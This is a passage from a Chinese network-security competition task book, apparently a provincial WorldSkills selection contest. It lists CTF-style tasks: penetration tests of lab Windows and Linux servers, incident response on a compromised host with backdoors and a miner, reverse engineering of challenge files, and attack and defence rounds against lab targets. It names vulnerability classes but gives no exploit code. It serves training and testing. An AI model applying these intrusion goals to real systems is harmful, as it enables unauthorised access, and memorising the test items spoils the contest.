  2. 通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,将该场景网络连接信息中的 DNS 信息作为 Flag 值 (例如:114.114.114.114) 提交;
  3. 通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,将该场景中的当前最高账户管理员的密码作为 Flag 值提交;
  4. 通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,将该场景桌面上 111 文件夹中唯一一个后缀为.docx 文件的文件名称作为 Flag 值提交;
  5. 通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,将该场景桌面上 111 文件夹中唯一一个后缀为.docx 文件的文档内容作为 Flag 值提交;
  6. 通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,将该场景桌面上 222 文件夹中唯一一个图片中的英文单词作为 Flag 值提交;

任务四:Linux 操作系统渗透测试

任务环境说明:

  • 服务器场景:Server06
  • 服务器场景操作系统:Linux(版本不详) (关闭连接)
  1. 通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交;
  2. 通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;
  3. 通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件名称作为Flag值提交;
  4. 通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件内容作为Flag值提交;
  5. 通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件名称作为Flag值提交;
  6. 通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件内容作为Flag值提交;
  7. 通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件名称作为Flag值提交;
  8. 通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件内容作为Flag值提交。

任务五:事件分析应急响应

任务环境说明:

  • 服务器场景:Server2228(开放链接)
  • 用户名:root,密码:p@ssw0rd123
  1. 找出被黑客修改的系统别名,并将倒数第二个别名作为Flag值提交;
  2. 找出系统中被植入的后门用户删除掉,并将后门用户的账号作为Flag值提交(多个用户名之间以英文逗号分割,如:admin,root);
  3. 找出黑客在admin用户家目录中添加的ssh后门,将后门的写入时间作为Flag值(提交的时间格式为:2022-01-12 08:08:18)
  4. 找出黑客篡改过的环境变量文件并还原,将文件的md5值作为Flag值提交;
  5. 找出黑客修改了bin目录下的某个文件,将该文件的格式作为Flag值提交;
  6. 找出黑客植入系统中的挖矿病毒,将矿池的钱包地址作为Flag值(提交格式为:0xa1d1fadd4fa30987b7fe4f8721b022f4b4ffc9f8)提交。

任务六:Reverse

任务环境说明:

√ 服务器场景:system09

√ 服务器场景操作系统:未知

√ FTP 账号:anonymous,密码:空

  1. 登录 FTP 服务器,对 re1.py 文件进行逆向分析,找出 flag 信息作为 Flag 值提交,;
  2. 登录 FTP 服务器,对 re2.py 文件进行逆向分析,找出 flag 信息作为 Flag 值提交;
  3. 登录 FTP 服务器,对 re3.py 文件进行逆向分析,找出 flag 信息作为 Flag 值提交;

     4.登录 FTP 服务器,分析 re4.c 文件进行逆向分析,找出 flag 信息作为 Flag 值提交;

     5.登录 FTP 服务器,分析 re5.c 文件进行逆向分析,找出 flag 信息作为 Flag 值提交;

      6.登录 FTP 服务器,分析 re6.c 文件进行逆向分析,找出 flag 信息作为 Flag 值提交。

(三)模块 C CTF 夺旗-攻击(200 分)

假定各位选手是某电子商务企业的信息安全工程师,负责企业某些服务器的安全防护,该服务器可能存在着各种问题和漏洞。你需要尽快对该服务器进行安全加固,15 分钟之后将会有其它参赛队选手对这些服务器进行渗透。

根据《赛场参数表》提供的第二阶段的信息,请使用 PC 的谷歌浏览器登录实战平台。

靶机服务器环境说明:

场景 1:HZBJ(Windows/Linux) 注意事项:

  1. 不能对裁判服务器进行攻击,警告一次后若继续攻击将判令该参赛队离场;
  2. Flag 值为每台靶机服务器的唯一性标识,每台靶机服务器仅有 1 个;
  3. 靶 机 服 务 器 的 Flag 值 存 放 在 /root/flagvalue.txt 文 件 或C:\\flagvalue.txt 文件中;
  4. 在登录自动评分系统后,提交对手靶机服务器的 Flag 值,同时需要指定对手靶机服务器的 IP 地址;
  5. 系统加固时需要保证靶机对外提供服务的可用性,服务只能更改配置,不允许更改内容;
  6. 本环节是对抗环节,不予补时。

可能的漏洞列表如下:

  1. 服务器中的漏洞可能是常规漏洞也可能是系统漏洞;
  2. 靶机服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;
  3. 靶机服务器上的网站可能存在文件上传漏洞,要求选手找到文件上传的相关漏洞,利用此漏洞获取一定权限;
  4. 靶机服务器上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限并进行提权;
  5. 操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限;

  1. 操作系统提供的服务可能包含了缓冲区溢出漏洞,要求用户找到缓冲区溢出漏洞的服务,并利用此漏洞获取系统权限;
  2. 操作系统中可能存在一些系统后门,选手可以找到此后门,并利用预留的后门直接获取到系统权限。

(三)模块 D CTF 夺旗-防御(200 分)

一、项目和任务描述:

假定各位选手是某安全企业的网络安全工程师,负责若干服务器的渗透测试与安全防护,这些服务器可能存在着各种问题和漏洞。你需要尽快对这些服务器进行渗透测试与安全防护。每个参赛队拥有专属的堡垒机服务器,其他队不能访问。参赛选手通过扫描、渗透测试等手段检测自己堡垒服务器中存在的安全缺陷, 进行针对性加固,从而提升系统的安全防御性能。

请根据《赛场参数表》提供的信息,在客户端使用谷歌浏览器登录需要加固的堡垒服务器。

二、操作系统环境说明:

客户机操作系统:Windows 10/Windows7 堡垒服务器操作系统:Linux/Windows

三、漏洞情况说明:

  1. 堡垒服务器中的漏洞可能是常规漏洞也可能是系统漏洞;
  2. 堡垒服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;
  3. 堡垒服务器上的网站可能存在文件上传漏洞,要求选手找到文件上传的相关漏洞,利用此漏洞获取一定权限;
  4. 堡垒服务器上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限并进行提权;
  5. 操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限;
  6. 操作系统提供的服务可能包含了缓冲区溢出漏洞,要求用户找到缓冲区溢出漏洞的服务,并利用此漏洞获取系统权限;
  7. 操作系统中可能存在一些系统后门,选手可以找到此后门,并利用预留的后门直接获取到系统权限。

四、注意事项:

  1. 每位选手需要对加固点和加固过程截图,并自行制作系统防御实施报告, 最终评分以实施报告为准;
  2. 系统加固时需要保证堡垒服务器对外提供服务的可用性;
  3. 不能对裁判服务器进行攻击,警告一次后若继续攻击将判令该参赛队离场;

  1. 本环节不予补时。二、说明:
  1. 所有截图要求截图界面、字体清晰;
  2. 文件名命名及保存:网络安全模块 D-XX(XX 为工位号),PDF 格式保存;
  3. 文件保存到 U 盘提交。

以上是关于第45届世界技能大赛“网络安全”赛项浙江省选拔赛竞赛任务书的主要内容,如果未能解决你的问题,请参考以下文章

2022-2023年度广东省职业院校学生专业技能大赛 中职组网络安全赛项竞赛规程

2023年江苏省职业院校技能大赛中职网络安全赛项试卷-学生组-任务书

2023年江苏省职业院校技能大赛中职网络安全赛项试卷-教师组任务书

2022-2023 年度广东省职业院校学生专业技能大赛中职组“网络安全”赛项竞赛任务书(样题)

2022年全国职业院校技能大赛(中职组)网络安全赛项A模块解析

2022年 全国职业院校技能大赛(中职组)网络安全赛项 正式赛卷 A模块 做题记录